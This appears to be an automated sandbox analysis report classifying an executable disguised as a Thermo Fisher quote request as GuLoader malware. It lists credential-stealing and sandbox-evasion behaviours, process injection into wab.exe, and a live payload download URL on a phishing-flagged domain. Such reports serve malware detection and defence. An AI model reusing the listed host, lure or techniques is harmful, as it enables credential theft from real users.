Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Thermo Fisher RFQ_TFS-1207.com.exe

Overview

General Information

Sample name:Thermo Fisher RFQ_TFS-1207.com.exe
Analysis ID:1501414
MD5:9768c048c979aeeeeb051574d452b626
SHA1:414d48d77fc71d29e58a92d02fa2d770fb854339
SHA256:19b8eabc143b4307a4496fec6012965f918e18d0e33a989292568f37a4c5f1ba
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • Thermo Fisher RFQ_TFS-1207.com.exe (PID: 2400 cmdline: "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe" MD5: 9768C048C979AEEEEB051574D452B626)
    • wab.exe (PID: 2668 cmdline: "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.91557808162.0000000037C21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.87355602773.00000000072D9000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: wab.exe PID: 2668JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        No Sigma rule has matched
        Timestamp:2024-08-29T21:56:43.611985+0200
        SID:2803270
        Severity:2
        Source Port:49838
        Destination Port:443
        Protocol:TCP
        Classtype:Potentially Bad Traffic

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://synergyinnovationsgroup.com/Avira URL Cloud: Label: phishing
        Source: https://synergyinnovationsgroup.com/wPKxzs124.binAvira URL Cloud: Label: phishing
        Source: https://synergyinnovationsgroup.com/wPKxzs124.bint#Avira URL Cloud: Label: phishing
        Source: https://synergyinnovationsgroup.com/BAvira URL Cloud: Label: phishing
        Source: Thermo Fisher RFQ_TFS-1207.com.exeReversingLabs: Detection: 50%
        Source: Thermo Fisher RFQ_TFS-1207.com.exeJoe Sandbox ML: detected
        Source: Thermo Fisher RFQ_TFS-1207.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 199.217.106.226:443 -> 192.168.11.20:49838 version: TLS 1.2
        Source: Thermo Fisher RFQ_TFS-1207.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405C60
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_004068B1 FindFirstFileW,FindClose,0_2_004068B1
        Source: Joe Sandbox ViewIP Address: 199.217.106.226 199.217.106.226
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49838 -> 199.217.106.226:443
        Source: global trafficHTTP traffic detected: GET /wPKxzs124.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: synergyinnovationsgroup.comCache-Control: no-cache
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /wPKxzs124.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: synergyinnovationsgroup.comCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: synergyinnovationsgroup.com
        Source: wab.exe, 00000002.00000003.87350938273.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.87351216123.0000000007BD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodo
        Source: wab.exe, 00000002.00000003.87350938273.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.91546935226.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.87351216123.0000000007BD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: wab.exe, 00000002.00000003.87350938273.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.91546935226.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.87351216123.0000000007BD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: Thermo Fisher RFQ_TFS-1207.com.exe, 00000000.00000000.86449721470.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Thermo Fisher RFQ_TFS-1207.com.exe, 00000000.00000002.87353727574.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: wab.exe, 00000002.00000003.87350938273.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.91546935226.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.87351216123.0000000007BD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: wab.exe, 00000002.00000003.87350938273.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.91546935226.0000000007BD1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.87351216123.0000000007BD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: wab.exe, 00000002.00000002.91546935226.0000000007BA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://synergyinnovationsgroup.com/
        Source: wab.exe, 00000002.00000002.91546935226.0000000007BA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://synergyinnovationsgroup.com/B
        Source: wab.exe, 00000002.00000002.91546935226.0000000007B48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.91556338444.00000000371E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://synergyinnovationsgroup.com/wPKxzs124.bin
        Source: wab.exe, 00000002.00000002.91546935226.0000000007B48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://synergyinnovationsgroup.com/wPKxzs124.bint#
        Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
        Source: unknownHTTPS traffic detected: 199.217.106.226:443 -> 192.168.11.20:49838 version: TLS 1.2
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_00405718 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405718

        System Summary

        barindex
        Source: initial sampleStatic PE information: Filename: Thermo Fisher RFQ_TFS-1207.com.exe
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_0040352F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040352F
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeFile created: C:\Windows\resources\0409Jump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_6FE71BFF0_2_6FE71BFF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_029A4A982_2_029A4A98
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_029A9B382_2_029A9B38
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_029A3E802_2_029A3E80
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_029A41C82_2_029A41C8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_029AB3242_2_029AB324
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_029AD1682_2_029AD168
        Source: Thermo Fisher RFQ_TFS-1207.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/13@1/1
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_0040352F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040352F
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_004049C4 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,0_2_004049C4
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_004021CF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,0_2_004021CF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsj4B37.tmpJump to behavior
        Source: Thermo Fisher RFQ_TFS-1207.com.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Thermo Fisher RFQ_TFS-1207.com.exeReversingLabs: Detection: 50%
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeFile read: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exe"Jump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
        Source: Thermo Fisher RFQ_TFS-1207.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

        Data Obfuscation

        barindex
        Source: Yara matchFile source: 00000000.00000002.87355602773.00000000072D9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_6FE71BFF LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FE71BFF
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeCode function: 0_2_6FE730C0 push eax; ret 0_2_6FE730EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_029AA060 push E8FFFFF7h; retf 2_2_029AA065
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 2_2_029A0C6D push edi; retf 2_2_029A0C7A
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\UserInfo.dllJump to dropped file
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\nsDialogs.dllJump to dropped file
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\nsExec.dllJump to dropped file
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsk4CBF.tmp\LangDLL.dllJump to dropped file
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Thermo Fisher RFQ_TFS-1207.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
